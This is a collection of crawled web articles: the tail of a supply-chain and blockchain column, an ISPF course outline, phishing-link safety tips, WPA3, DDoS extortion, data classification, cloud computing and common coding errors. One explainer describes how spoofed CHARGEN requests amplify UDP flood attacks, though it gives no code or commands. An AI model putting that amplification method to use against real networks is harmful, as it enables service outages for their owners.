<urn:uuid:b29d04a5-5c04-4718-be1c-5f01cded91d5>
|
CC-MAIN-2022-40
|
https://sdi.ai/blog/future-state-architecture/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00258.warc.gz
|
en
| 0.934533 | 2,296 | 2.8125 | 3 |
Finding the weakest link
Things get even more interesting when we delve into the “trust” bucket because, though tech does play a part, there are also philosophical, ethical, and human perspectives to consider. As information and knowledge managers, we naturally understand why people need access to well-governed, accurate, and timely data and knowledge (information). But surrounding the creation, management, and dissemination of that information are often invisible rules and processes that pivot around our concepts of trust. A throwaway but catchy phrase we have used for years runs along the following lines of “the right information, at the right time, to the right person.” It’s a good phrase, but when we use the word “right,” we mean “correct.” We ask questions such as: Are there multiple versions? Is this the correct version? Is the information accurate? Has it been changed? To validate the answers to those questions, we rely on systems of trust and supervision.
Yet today, if you underpin your information management systems with a blockchain, everyone has the same version of the “truth,” so these questions become unnecessary. In effect, blockchains provide a trustless system; they remove the need to trust one another. That eliminates the need for multiple copies of a document and, notably, the need to regularly verify that this document (or data) is correct. It may also mean that some links can be removed altogether from our “chains.”
Accuracy through automation On parallel lines, all humans make mistakes such as misfiling a piece of information, incorrectly inputting data, or missing essential elements in longform documents. Technology is not perfect and it can never be error-free, but document capture and understanding technologies, such as optical character recognition (OCR) and natural language processing (NLP), today typically produce much lower error rates than humans. If the tech has any doubts, it can flag that for a user to verify. In short, we can often trust the correctness and quality of information captured by technology more than information processed by a human.
This may seem a stretch, and all technology can be misused or poorly implemented and maintained. But assuming the technology has been used well, it is typically much more accurate and relatively error-free. Hence, we can trust the technology to manage the bulk of our information assets, and maybe only check or supervise a tiny percentage. Similarly, an automation tool undertakes manual, repetitive tasks the same way every time, whereas quirky real-world humans will stray at times.
The scale of opportunity
So, back to the supply chain world of warehouses, containers, ships, trucks, refrigeration units, and barcodes. The supply chain has run remarkably well since time immemorial, but it only takes one weak link to impact the entire chain; for example, a mismatched invoice, an incomplete export document, or a missing bill of lading. For generations, trust and relationships have kept the wheels turning. Though that will always be part and parcel of good business, it’s now possible to eliminate many trust-based links, dramatically reduce human error, and move the onus of trust away from individuals and onto the system. The technology available today works well; the challenge for the supply chain, and indeed for us all, is to grasp the scale of the opportunity we have and to take some leaps of faith, reimagining ideal operating scenarios, whether in shipping crabmeat across an ocean or managing complex knowledge networks.
Supply chain professionals are finding this shift hard to deal with, but the intense pressures of the past couple of years motivate them to move forward. I hope that the lessons they learn and share as they transform will, in coming years, be valued and used by us all to reimagine, reinvent, and revitalize information management and knowledge management practices and strengthen or even eliminate our weakest links.
|
<urn:uuid:37c647d1-c193-4843-9058-d62966aa5fea>
|
CC-MAIN-2022-40
|
https://www.kmworld.com/Articles/Columns/Ethical-innovation/Finding-the-weakest-link-153635.aspx?pageNum=2
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00258.warc.gz
|
en
| 0.927985 | 806 | 2.5625 | 3 |
The Managing Data Files and Definitions with ISPF/PDF course explains how to use the ISPF menu options to display the contents of Data Sets and how functions such as; copying, printing, renaming, and deleting are performed on these objects.
Computer operators and trainee programmers or analysts who want a working knowledge of ISPF utilities.
A reasonable understanding of Data Set allocation and familiarity with editing Data Sets.
After completing this course, the student will be able to:
- Use the Common ISPF Utilities
- Create and Manage Data Sets
- List Data Sets
- Identify Data Set and VTOC information
Managing Data Sets Using the ISPF Data Set Utility
Identify Partitioned and Sequential Data Sets
Access the Data Set Utility and View Data Set Information
Allocate, Rename, and Delete Data Sets
Managing Partitioned Data Sets Using the ISPF Library Utility
Print, Copy, Rename, and Delete Partition Data Set Members Using the Library Utility
The ISPF Copy, Search, and Statistics Utilities
Copy or Move Data Sets or Members of Data Sets
Reset and Delete ISPF Statistics
Search a Data Set or Members of a Data Set for Text Entries
Managing Data Sets Using the DSLIST Utility
Display Lists of Data Sets and z/OS UNIX Directories and Files Using DSLIST
Identify and Use the Common DSLIST and TSO Commands in a Data Set List
Display the VTOC of Specific Volumes
|
<urn:uuid:0c273177-e874-4e9f-857e-aedec38afefe>
|
CC-MAIN-2022-40
|
https://interskill.com/?catalogue_item=ispf-z-os-managing-data-files-and-definitions-with-ispf-pdf&noredirect=en-US
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00258.warc.gz
|
en
| 0.791681 | 325 | 2.78125 | 3 |
Following a link in an email, text or on certain websites is always a bit of a gamble. On the other end of the link could be the information you want to see, or it could be a malicious website, virus-filled download or inappropriate content.
Of course, we’re talking about phishing attacks. That’s when cybercriminals email, text or post malicious links online hoping to trick victims into clicking them so they can rip them off. These types of attacks have really picked up during the COVID pandemic. Tap or click here to find out why scams are rising.
We always recommend not clicking links found in emails or texts unless you’re 100% sure they’re safe. But even links sent from sources you may trust can be malicious now that scammers are great at spoofing. So how do you know when it’s safe to click? There are some important questions you can ask first that will give you a good idea if the link is safe or not.
1. Where did the link come from?
Perhaps the most important question you can ask is how you got the link in the first place. Was it in an unsolicited email or text message? Did you get it in a Google search? Was it in a friend’s Facebook post?
As a rule, if a link is unsolicited, you don’t want to click on it. Hackers send out malicious links in emails and texts daily. They’re especially good at putting links in emails that look like they’re from legitimate companies. If the link is from someone you know, check with them first to make sure they really sent it, and that their account wasn’t hacked.
Links you find for yourself are going to be safer, but you still need to be cautious. A Google search is a good example. Hackers use a tactic called “search engine poisoning” to get malicious links to the top of a Google search for popular words and topics.
The same goes for Facebook. In general, links your friends post are going to be OK, but one of them might have been tricked into sharing a malicious link, or they installed an app that does it for them. Keep reading and we’ll look at some other questions that will help reveal those dangers.
2. Why am I clicking the link?
OK, this question sounds philosophical, but we’re not actually asking “why” you do things in the general metaphysical sense. We’re asking you why you want to click on that particular link.
Is it out of fear that something bad will happen if you don’t? Are you responding to greed or anger? Is it out of lust? These are just a few of the triggers that hackers use to trick you into clicking.
For example, an email might say your bank account has been hacked and you need to click right away and enter your information so the bank can get your money back. Maybe you see a post on Facebook saying you could win the lottery or get a brand new expensive tech gadget for free.
Perhaps it’s a political post that asks you to sign a petition against something that makes you angry. And don’t forget the ever-popular promise of racy images or video on the other side of a link.
If you find yourself on the verge of reacting out of emotion, take a second and really think about why you’re doing what you’re doing. You might realize that you’re being manipulated. And we’re about to tell you how you can know for sure.
3. Does the link look right?
Web links follow certain rules. That means you can often tell at a glance if one is on the up-and-up. The biggest tip-off is the domain name. For example, the domain name of my site is “komando.com.”
It might have a prefix, such as “www.komando.com,” “news.komando.com,” or “station-finder.komando.com.” Or it might have a suffix, such as “komando.com/how-tos” or “komando.com/news.” But no matter what, “komando.com” is going to be the centerpiece of any link on our site.
So, if you got an email claiming to be from Komando but the link was “www.somethingelse.com/this-is-fake” or even “komando.somethingelse.com/also-fake” or “somethingelse.com/komando,” you know something is up.
Sometimes this can get a little tricky. For example, Google’s shortening service is “goog.le,” but on the whole, it’s a good thing to check. However, there are a few more tricks hackers like to pull.
You may also like: This search engine doesn’t track you like Google does
Earlier, we mentioned search engine poisoning where hackers get malicious links to the top of a search results page. If you’re doing a Google search, look just below the page title in the search results to see where the link is coming from. If you’re looking for a page on one company’s site, and the link is to another site, then proceed with caution.
Another trick is that the text of a link and the link itself doesn’t have to be the same. In an email or online, you can hover your mouse cursor over a link and then look down in the lower part of the screen to see what the link really is. You can also right-click on the link, choose “Copy link” or “Copy link address” and paste the link into a word processor to see what it really is.
Sometimes you’ll run into shortened links, especially on Facebook and Twitter. These are often legitimate links, but it will just show bit.ly/123456, goog.le/123456 or t.com/123456.
In general, as long as the person posting them is legitimate, you’re OK. If it’s a random account you stumbled on that doesn’t have a lot of followers or is posting nonsensical information, be more cautious. Of course, sometimes it helps to get a second opinion.
4. Is there a second opinion?
Sometimes when you’re in a rush, you don’t always check links as thoroughly as you should. Or maybe you think a link in a Google search or on a website is bad, but you aren’t sure.
Most security companies have software that watches links and lets you know if they don’t go where you think, or if other people have reported them as being a problem. Check your security software to see if it has a URL reputation system you can enable in your browser, as most do.
5. What’s on the other side?
If you’re even a little suspicious of a link, you shouldn’t click on it. Better safe than sorry. And if it’s information you really need, you can usually visit a company’s site directly to find it, or look it up in a Google search.
However, sometimes you’ll click on a link and wind up in a place that sets off red flags. Maybe the site isn’t the company site you were expecting; it might look like it was thrown together, or it could pester you to enter information you know you shouldn’t give out.
Remember, it’s always OK to walk away. Close the browser tab and go find the information somewhere else.
|
<urn:uuid:45bb9555-83bb-4f15-b47c-bcde842b90ad>
|
CC-MAIN-2022-40
|
https://www.komando.com/safety-security-reviews/questions-to-avoid-phishing/349664/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00258.warc.gz
|
en
| 0.932083 | 1,653 | 3.015625 | 3 |
Deep inside CHARGEN flood attacks
Deep inside CHARGEN flood attacks
The CHARGEN protocol, also known as the Character Generator Protocol, is a network service defined in 1983. Its specifications are laid out in RFC 864. CHARGEN flood attacks were developed to simplify testing, troubleshooting and evaluating networks and applications. The Character Generator Protocol is based on the simple idea of providing a service that can be accessed both by TCP and UDP protocol (via port 19). If the service is accessed, it will use that connection to send a random number of random characters (data).
Unfortunately, the implementation of the protocol carries several security risks. The service is used relatively infrequently nowadays but is often still available, for example on older Windows servers, Windows desktop PCs, printers and home routers.
CHARGEN flood attacks exploit these remaining CHARGEN protocol points of contact. The most common type of these attacks uses CHARGEN as an amplifier for UDP-based attacks using IP spoofing. The attack itself is rather simple: the attacker has their botnet send tens of thousands of CHARGEN requests to one or more publicly accessible systems offering the CHARGEN service. The requests use the UDP protocol and the bots use the target’s IP address as sender IP so that the CHARGEN service’s replies are sent to the target instead of the attacker. That way, tens of thousands of replies are submitted to the target of the attack.
This is what the communication structure looks like (the example has just one bot attacking):
The attacker usually makes use of another feature of the CHARGEN protocol described in the following excerpt from RFC 864:
UDP Based Character Generator Service
Another character generator service is defined as a datagram based application on UDP. A server listens for UDP datagrams on UDP port 19. When a datagram is received, an answering datagram is sent containing a random number (between 0 and 512) of characters (the data in the received datagram is ignored).
There is no history or state information associated with the UDP version of this service, so there is no continuity of data from one answering datagram to another.
The service only send one datagram in response to each received datagram, so there is no concern about the service sending data faster than the user can process it.
CHARGEN flood attacks can be dangerous
The content of the requests to the CHARGEN service are ignored, and replies of random length are sent – the default for replies is between 0 and 512 characters (bytes). However, replies containing 1024 bytes are possible as well. That way, a request with a content of 1 byte may result in a reply of 512 bytes or more. This is referred to as an amplification by a factor of 512 in terms of payload. This means that an attacker need only send a small fraction of the data volume that will actually hit the target. Simply put, a bot with a bandwidth of 10 Mbps can perform an attack at over 5 Gbps – and an entire botnet can generate attacks ranging in the hundreds of Gbps.
The following CHARGEN request with a corresponding reply should demonstrate the principle of amplification very well (no layer-2 and layer-3 header shown):
In terms of payload, this means an amplification factor of 1024. The request is made up of 1 byte of data but the reply of 1024 bytes. Looking at the packet, a request packet of 60 bytes results in a reply packet of 1066 bytes, an amplification factor of 17-18.
This is what the botnet communication looks like including amplification:
Potential threats that can occur
The target faces several threats:
- Internet connection overload
- DDoS attacks
- Overload of the components processing the packets
The worst possible outcome of this type of attack is complete failure of the target’s internet connection. Be prepared and get a reliable protection now.
|
<urn:uuid:85dbaa61-0ae2-46ed-be8b-fcb74fd59ba1>
|
CC-MAIN-2022-40
|
https://www.link11.com/en/blog/threat-landscape/chargen-flood-attacks-explained/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00258.warc.gz
|
en
| 0.921483 | 791 | 3.359375 | 3 |
The way we connect to the Internet will change forever. We all know about Wi-Fi. It is a wireless networking protocol that lets all of our devices connect to the Internet without any cords. Most people have a Wi-Fi connection in their homes or at work. Most restaurants, coffee shops, and hotels offer this form of connectivity as well. But this technology hasn’t changed since 2004—until now.
In 1971, the Hawaiian Islands were connected through a UHF wireless packet network using Ethernet called ALOHAnet. But the beginning of Wi-Fi technology as we know it today was started by Vic Hayes, also referred to as the “father of Wi-Fi.” Hayes was the chair of the IEEE committee, which created the 802.11 standard. The standard radio frequency was created in 1997.
In 1999, a faster version was released called 802.11a. This version had a speed of 54 megabits per second, but had limited range and was very expensive. Soon after, 802.11b was released and had a greater range than its predecessor, and it was a more affordable version for the masses. Wireless networking became very popular and a group of companies created the Wireless Ethernet Compatibility Alliance (WECA). This organization tested wireless equipment aiming to advance the technology. In 2002, the term Wi-Fi (a combination of Wireless and Hi-Fi) was coined, and WECA changed their name to the Wi-Fi Alliance.
A new improved Wi-Fi is important because we all want faster Internet speeds and maybe, more importantly, we all want to protect our information.
Just recently, there was a newly exposed weakness in Wi-Fi connectivity. A researcher from Belgium found out that a hacker could sneak into your Internet traffic history and view all of your information as long as you were sharing a Wi-Fi connection. This was called the “Key Reinstallation Attack” or KRACK. Even if one changes their Wi-Fi password, a hacker can still get into your system if they know how to use KRACK.
Public Wi-Fi is probably one of the most unsafe connections there are. Anytime you use a Wi-Fi in a coffee shop, restaurant, or hotel, you are susceptible to attacks. Most of these places use an unencrypted network, which hackers can easily get into. No matter where you are, you should try not to use a public Wi-Fi network. If you are looking for extra security, using a Virtual Private Network can help you protect yourself even further.
Here is how to quickly check what type of security your current connection has:
Windows: Click on the wireless indicator at the bottom right corner of your screen. Choose the network you are connected to and you will see what type of encryption under Security Type.
Mac: Click on the Apple logo on the top left corner. Click on System Preferences and select Network. Click on the Advanced option on the bottom right corner. And you will see what type of encryption listed as Security under the Wi-Fi tab.
The Wi-Fi Alliance recently introduced a new protocol, Wi-Fi Certified WPA3, which will be the successor of the WPA2 Wi-Fi that we have all become accustomed to. According to the Wi-Fi Alliance, the next generation of Wi-Fi will be an upgrade to the older protocol focusing on new enhancements regarding security, primarily a stronger authentication system, and increased cryptographic capacities.
There will be two different types of WPA3 operations: a personal mode and an enterprise mode.
WPA3-Personal is the mode that most of us will be using. This new mode, however, will have an upgraded password-based authentication system. WPA3-Personal will also use Simultaneous Authentication of Equals (SAE), which will help prevent hackers from hacking your Wi-Fi connection. WPA3 will make it harder for people to guess your password over and over again.
WPA3-Enterprise will be most likely be used by the government and finance companies. This mode will have a stronger security system than the personal version with a comparable strength of a 192-bit cryptographic system. This mode will ensure the highest form of security for Internet connectivity.
The switch to the new Wi-Fi protocol won’t happen suddenly. It may actually take a couple years for all of us to be fully integrated into this new program. First off, the new WPA3 capable hardware is needed. We will all need a new router that supports WPA3. Our gadgets also need to support the new protocol as well. Luckily, the new devices that support or will support the new WPA3 will also still support the older WPA2 as well.
Getting ready for adaption of the new protocol, Intel has announced that they will have chipsets ready for the new advancement in Internet connectivity. The WPA3 compatible, 802.11ax, promises faster speeds than its 802.11ac that came before. They are claiming increases of up to 40 percent higher peak data rates to be exact. Intel is also stating that there will be an improvement of at least four times in congested areas.
This is great timing because many homes are incorporating more smart devices. The need for faster connectivity is crucial in a connected home. The performance capabilities between the new 802.11ax along with the new WPA3 protocol should help bring us into the age of high-performance connectedness.
The new advancement in Internet connectivity will be welcomed news by everyone since we haven’t seen an update to the WPA protocol since 2004. Our personal information and the security of that information are important to everyone. We live in a time where hackers are becoming smarter so our system needs to be more intelligent as well. The Wi-Fi Alliance’s WPA3 update and Intel’s 802.11ax update will be faster and more secure than we currently know.
There will come a time where we will all need an upgrade from this the WPA3 protocol, but until that time comes—this is great news for our security.
|
<urn:uuid:764c2378-54da-4a50-80ce-ed76b8d61422>
|
CC-MAIN-2022-40
|
https://www.colocationamerica.com/blog/newest-wifi-standard?amp
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00458.warc.gz
|
en
| 0.955362 | 1,250 | 3.046875 | 3 |
Criminal gangs are increasingly using the internet as a tool to extort money from businesses. Thousands of distributed denial of service attacks (DDoS) are occurring globally every day and it is vital that senior management wakes up to the very real risk of such an assault.
The rise of the internet carries a number of threats in the form of viruses, hackers, worms, and malware. Most companies are aware of these risks and have the appropriate processes and technology in place to mitigate them.
But in the last few years these internet-based threats have taken on a more malevolent and sophisticated nature; virus writing is no longer the pastime of teenagers with too much time on their hands – instead, viruses are now being written for organized cyber-criminals motivated only by money.
Extortion – A growing problem
DDoS attacks are launched with the sole aim of crashing a company´s website or server by bombarding them with packets of data, usually in the form of web requests or emails.
Unlike single source attacks (which can be stopped relatively easily), the attacker compromises a number of host computers which, in turn, infect thousands of other computers that then operate as agents for the assault.
These infected host computers, known as ´zombies´ or ´bots´, then start flooding the victims´ website with requests for information – creating a vast and continuous stream of data that overwhelms the target website, thus preventing it from providing any service.
Every business is at risk
The cost of a DDoS attack can be substantial and it has been estimated that as many as 10,000 occur worldwide everyday. DDoS extortion attacks were originally used against online gambling sites.
Criminal gangs would initiate attacks that would bring the website down just before a major sporting event, inflicting maximum financial damage. Now, however, DDoS attacks are increasingly being used to extort money from all sorts of businesses.
There are numerous examples of DDoS attacks that can be cited. One of the most well known DDoS attacks occurred early last year: ´MyDoom´ infected hundreds of thousands of computers before launching an attack on SCO (a Utah based Unix vendor) that took the company out of business for several weeks. The motivation for the attack has never truly been established.
DDoS attacks are a truly global threat as the extortionists are not restrained by traditional borders. Even the Greater Manchester Police have fallen victim to an assault; recently its chief constable was subjected to 2,000 emails an hour in an attempt to crash the force´s computer systems.
DDoS attacks are also being used for political purposes. On Valentine´s Day this year animal activists set up a chat-room and encouraged people to log on and ´chat´ at the same time. For every word typed an email would be sent to the target organizations in the vivisection and fur industries in an effort to crash their websites.
The reality is that no company is safe. The problem is exacerbated by the fact that DDoS attacks do not simply affect the organizations they are targeted at, but can in fact bring down the Internet Service Provider (ISP).
Lack of awareness is making businesses vulnerable
Despite the substantial damage DDoS attacks can cause, research released by IT Company IntY earlier this year has revealed an alarming lack of awareness amongst businesses about the threat posed.
According to IntY, more than half of UK companies are at risk because this lack of understanding has resulted in a widespread failure to implement the necessary preventative technology. It is vital that senior decision makers wake up to the very real threat posed by DDoS attacks. A failure to do so could have far reaching consequences.
All businesses with an online arm should implement the necessary preventative measures to mitigate the threat of a DDoS attack.
Many companies rely on reactive measures such as blackholing, router filters and firewalls, but all these methods are either inefficient, not sophisticated enough to protect against cyber-criminals or can only be configured to specific external sources.
A multi-layered approach to defence
While all these tools do possess crucial security features, they fail to offer sufficient protection against the ever evolving and sophisticated nature of these assaults. If companies are to successfully combat a DDoS attack a truly multi-layered approach to defence must be adopted.
Thus it is vital to establish a solid relationship with your service provider to ensure that you are aware of the measures that are available to protect your network and online business.
Recent research by Arbor Networks revealed that DDoS attacks are the most crippling threat facing ISPs today, yet only 29 per cent of ISPs surveyed offer security and DDoS service levels agreements to their customers.
Because DDoS attacks are launched from thousands of computers around the world it is essential that companies share information about the attacks if they are to be stopped. Such assaults cannot be fought alone and a collaborative effort is vital.
A number of ISPs including Belgacomm, Cable & Wireless and COLT have signed up to Arbor Networks Fingerprint Sharing Alliance which enables them to share detailed attack information in real time and block attacks closer to the source.
Once an attack has been identified by one company, the other ISPs in the Alliance are automatically sent the ´fingerprint´ enabling them to quickly identify and remove infected hosts from the network.
This enables businesses and their ISPs to stay abreast of security threats as they arise. The Alliance is helping to break down communication barriers and its rapid growth marks a significant step forward in the fight against cyber-criminals.
The threat of being blackmailed by organized criminals using DDoS attacks is very real and businesses cannot afford to be complacent. Such attacks are capable of bringing even the largest companies to their knees.
However, stand-alone defences are insufficient to combat these attacks and a comprehensive approach to security must be implemented. Not only should a multi-layered security strategy be instilled at enterprise level, but companies must also work with their ISPs to ensure that they too have taken preventative measures.
|
<urn:uuid:0ddb00af-ecf2-4f90-b59f-68125f2778fd>
|
CC-MAIN-2022-40
|
https://it-observer.com/cyber-extortion-very-real-threat.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00458.warc.gz
|
en
| 0.957474 | 1,227 | 2.75 | 3 |
To put it simply, in order to protect your sensitive data, you need to know exactly what data you are trying to protect. Data classification allows you to categorise information based on how sensitive certain data items are by injecting metadata into documents, emails, etc. This information can be used to alert users about the degree of sensitivity associated with the data they are handling. This is akin to putting a sticker on a box saying “Fragile! Handle with care!”.
This metadata can be used by Data Loss Prevention (DLP) software to ensure that sensitive data is not allowed to be shared outside of the organisation’s network. Likewise, the metadata can be used by specialised encryption software to ensure that sensitive data is automatically encrypted as it moves around the network – both internally and externally. Data classification also allows organisations to store different categories of data in a tiered fashion. For example, important data that needs to be readily available can be automatically moved to high-performance storage. In addition to the performance benefits, it can also help reduce costs, as less important data requires less valuable resources. It is important to think carefully about what data you want to classify. If you choose to classify everything, the costs will be high.
An effective classification system requires a degree of centralised control. Sophisticated auditing solutions such as Lepide Data Security Platform provide an intuitive dashboard to help administrators ensure that the classified data is consistent with the access controls assigned to that data. However, before you start classifying data, it would be a good idea to first start with a full audit, and then build the classification system around the results. Since it is good practice to only store data that you need to store, you may want to consider using a data cleansing application that helps to delete redundant, duplicate or obsolete content. Of course, to have an effective classification system, you will need to educate your staff members about how the system works, and why the system is important.
Classified Data is typically categorised as either public or private. Public information can be accessed by anyone, at any time, and includes things like marriage certificates, birth certificates, criminal records, etc. Private data, as you might expect, is data that you don’t want anyone to view without explicit approval, and includes personally identifiable information (PII), protected health information (PHI), etc.
Data classification and GDPR
As you may already know, the GDPR will soon come into effect, and when it does, the need for data classification will be greatly increased. Under the GDPR, organisations will need to pay close attention to their data and be able to identify unusual behaviour on their network quickly. They will need to know exactly where their sensitive data is stored, who has access to this data, who should have access to this data, and when this data is being accessed. Again, using real-time event detection and reporting solutions such as Lepide Data Security Platform, answering these questions will be much easier. Likewise, Lepide DSP is capable of generating over 300 pre-defined reports, which can be used to satisfy regulatory compliance requirements with minimal effort.
|
<urn:uuid:50a2983e-2cdb-4583-a513-dc55035ff834>
|
CC-MAIN-2022-40
|
https://www.lepide.com/blog/the-importance-of-data-classification/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00458.warc.gz
|
en
| 0.942318 | 640 | 2.640625 | 3 |
This article will explain what cloud computing is, define its common variants, and offer some insights into when it is or is not beneficial to your small business.
What are the different types of cloud computing?
The expression ‘cloud computing’ gets thrown around a lot – but the reality is that this term is merely an umbrella which encompasses three main types of services, Software as a Service (SaaS), Infrastructure as a Service (IaaS), and Platform as a Service (PaaS). Let’s explore each of these in turn:
SaaS (Software as a Service)
Software as a Service is the most common type of cloud computing – in fact it is highly likely that you’re already using one or more of these services! Almost all email services, Quickbooks, Slack (and most competing messaging services as well), Microsoft 365, Canva, Salesforce, and even Netflix are examples of SaaS!
What differentiates these pieces of software from software of yesteryear is that your ability to use them is contingent upon an ongoing subscription.
Some examples of SaaS, like Netflix, operate in such a way that it is difficult to even tell that you’re paying for software! Your subscription fees obviously pay for the rights to stream their content right? But users aren’t allowed to stream Netflix to just any app! All Netflix users must use Netflix’s proprietary software – and there are no open source APIS or other video streaming options which connect to their backend.
While some SaaS install to your local drive (such as the Netflix app on your computer or phone), others are available to access and use via your web browser. Netflix is a great example of software that is available both as a downloadable resource, and as a web application.
Increasingly software is being developed as cloud-native services – meaning that they were designed from the ground up with cloud in mind. Services like Canva, a web-based graphic design service, are only available as web applications – and have no downloadable version available to use.
IaaS (Infrastructure as a Service)
Infrastructure as a Service might sound complicated, but is actually a type of cloud solution which is quite commonly used by consumers and small businesses. The most common type of IaaS is cloud storage, where instead of using networked harddrives for storage solutions, a web-based storage solution is used instead. This includes Microsoft’s OneDrive, DropBox, and Google Cloud Storage.
Beyond cloud storage, IaaS includes a variety of other remote computing services like web servers and even entire virtual machines. Microsoft Azure, Amazon AWS (Amazon Web Service), and Google Cloud are the three best known IaaS providers – offering a wide range of virtualization services.
In the past these remote computing options were of limited utility due to high latency (the time it takes for cloud computers to communicate with your own system) but in recent years high speed, low-latency connections have become common-place. All but the most demanding system requirements can now be easily carried out over widely available internet connections.
Unlike SaaS, IaaS puts most of the control within the user’s hands – simply offloading the physical computing power and data storage to data centers. This is handy for small businesses with ‘peaky’ workloads, offering cost effective alternatives to costly physical servers or on-premise storage which may only be fully utilized a small percentage of the time.
PaaS (Platform as a Service)
While IaaS’s give small businesses virtual machines to work with, PaaS’s give companies a virtual machine which is pre-loaded with software. Rather than develop your own ecosystem, a PaaS allows companies to pay by the user, or pay for the resources used, and have access to a complete cloud platform. This cloud environment is hosted remotely, and includes everything from servers to software.
The big names from the IaaS world also are the dominant PaaS providers, and include Microsoft Azure, AWS, and Google Cloud.
Even household consumers are partaking in PaaS services – although many people don’t recognize it as such. Internet of Things (IoT) devices like smart thermostats, doorbells, security cameras, and smoke alarms operate on remote platforms which users are able to access via apps or their web browser. Your Nest thermostat or Ring doorbell isn’t hosting its own server – but is instead living on the cloud!
Where is all of this information hosted?
While all cloud environments host information remotely, how the information is hosted can vary depending upon your company’s needs.
Public Cloud Infrastructure
A public cloud infrastructure is accessible via the internet and offers resources which are shared amongst multiple users. This sort of cloud server, also referred to as multi-tenant cloud environments, are the cheapest option available as the hardware costs are shared across a large number of end users.
However, as public cloud services are accessible by anyone with an internet connection, there is a greater exposure to risk with this sort of environment. Thankfully, with modern encryption protocols and multi-factor authentication, this risk is generally minimal.
Another benefit of public cloud infrastructure is scalability and elasticity. If your company needs to use more resources, cloud service providers are able to allocate your business more computing resources. This process is effectively invisible to the companies making use of it and generally requires no additional work from the users (although in some cases like cloud storage users may be required to sign up for more storage when they approach their limits).
Private Cloud Infrastructure
Private cloud infractures differ from public clouds in that the cloud computing services are not shared with any other users. These single-tenant cloud environments offer a greater degree of customization and security than public clouds, although these benefits don’t come cheap.
The security benefits of private clouds include the ability to implement your own firewalls and DevOps protocols, but companies are responsible for managing their own clouds and will need to hire and maintain a team of IT staff along with operating the on-premises hardware necessary to run the cloud on.
Hybrid Cloud Infrastructure
For many companies a hybrid cloud infrastructure offers the flexibility of public cloud computing alongside the security and control of private cloud services. In a hybrid cloud environment, businesses may use the public cloud to host their SaaS cloud applications, while sensitive data is kept safely on private servers.
When well implemented, the effect of using a multi-cloud environment is seamless and a business’s end users will be able to switch between public and private cloud resources without even noticing the transition.
What are some of the benefits of cloud computing?
Cloud computing offers considerable benefits, including cost savings, protection against depreciation, scalability, accessibility, reduced maintenance, and the ability to access otherwise cost-prohibitive resources.
If your company is currently hosting its software on a local server then you may stand to save money by switching to cloud computing. Servers need to be monitored and maintained by skilled technicians and use a surprising amount of electricity.
Shifts Business Costs
In addition to the costs of running a server, small businesses need to consider the capital expenses related to maintaining a local server. The server itself must be purchased and then immediately begins to depreciate. While servers and mainframes are generally built robustly and age gracefully, if your business rolls out new software or operating systems, older hardware may serve as a performance bottleneck.
Cloud computing helps companies to avoid the gradual decline in performance over time and switches the accounting from one of capital expenses and depreciation to predictable operating expenses.
This is one of cloud computing’s greatest strengths. When small businesses purchase hardware for their private servers they have to weigh the cost of the hardware versus their predicted future requirements. It is generally unwise to purchase equipment that is oversized, as that extra performance comes at additional cost and will remain unused most of the time.
One option is to simply install upgrades when the time comes, but this can be easier said than done and will involve additional cost and possible downtime as the new system is brought online.
Cloud computing on the other hand suffers from no such limitations. Cloud providers are capable of increasing the amount of resources your company has access to on an as needed basis and offer pricing which will vary in relation to your company’s needs.
An added benefit of this flexibility is that if your company has extremely variable or ‘peaky’ computational needs the cloud environments are able to offer more computing bandwidth on an as-needed basis. For startups who are operating on a tight budget this can provide the capability for high-end processing without the capital expenditure of high-end equipment.
Ease of Access
A huge advantage of cloud computing is its accessibility. Unlike private servers, public cloud providers offer real-time access from anywhere in the world. In a world where more people are working from home this is almost immeasurably valuable.
A common argument against work-from-home is that employees won’t have access to the resources they need to get the job done – cloud computing offers a solution to this issue.
Another benefit of moving your business’s resources to the cloud is that cloud security is baked in from the start. Whenever companies try to implement remote access to private servers they are introducing an element of danger – but cloud providers have already taken steps to mitigate these risks and generally offer more security than a typical small business is capable of implementing themselves.
Should I move my business to the cloud?
The short answer is: It depends. If you’re considering moving your business to the cloud you should first have a professional take a look at your IT infrastructure and determine where implementing cloud computing will most benefit your business.
For most companies, cloud computing offers at least some degree of benefit. Every use case varies of course – some businesses may need cloud based automation, while others might only use the cloud for its disaster mitigation and business continuity assurances.
Whether you’re ready to make the move to the cloud or want to know how you can optimize your existing cloud services, Bristeeri Tech offers managed IT service solutions for small businesses. The time to modernize and move to the cloud is now – don’t miss out on the cost savings, scalability, and flexibility that cloud computing has to offer.
|
<urn:uuid:70cf11f4-27ef-40bd-b6f7-92f1c7d00c6b>
|
CC-MAIN-2022-40
|
https://bristeeritech.com/it-security-blog/what-is-cloud-computing/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00458.warc.gz
|
en
| 0.944153 | 2,158 | 2.796875 | 3 |
International security organisations have updated and restructured a list of 25 common programming errors that cause security vulnerabilities and expose software users to cyber attack.
The US-funded collaboration project, which is managed by the Mitre and Sans Institute and brings together security experts from more than 30 global organisations, first compiled its list of 25 risky coding practices in January 2009.
The structure of the list has been modified to make it easier to use by distinguishing mitigations and general secure programming principles from more concrete weaknesses, the organisations said.
This year's top 25 entries are prioritised using inputs from more than 20 organisations, which evaluated each weakness based on prevalence and importance.
Cross-site scripting tops the list, which aims to help businesses improve their software procurement by requiring code to be free of these errors.
The goal is to force suppliers to test the security of their software and to provide customers with their test results. No one likes to share test results that show them writing bad code, said Alan Paller, director of research at the Sans Institute.
New York State is changing its procurement language to ensure that the top 25 errors are avoided, with other states expected to follow.
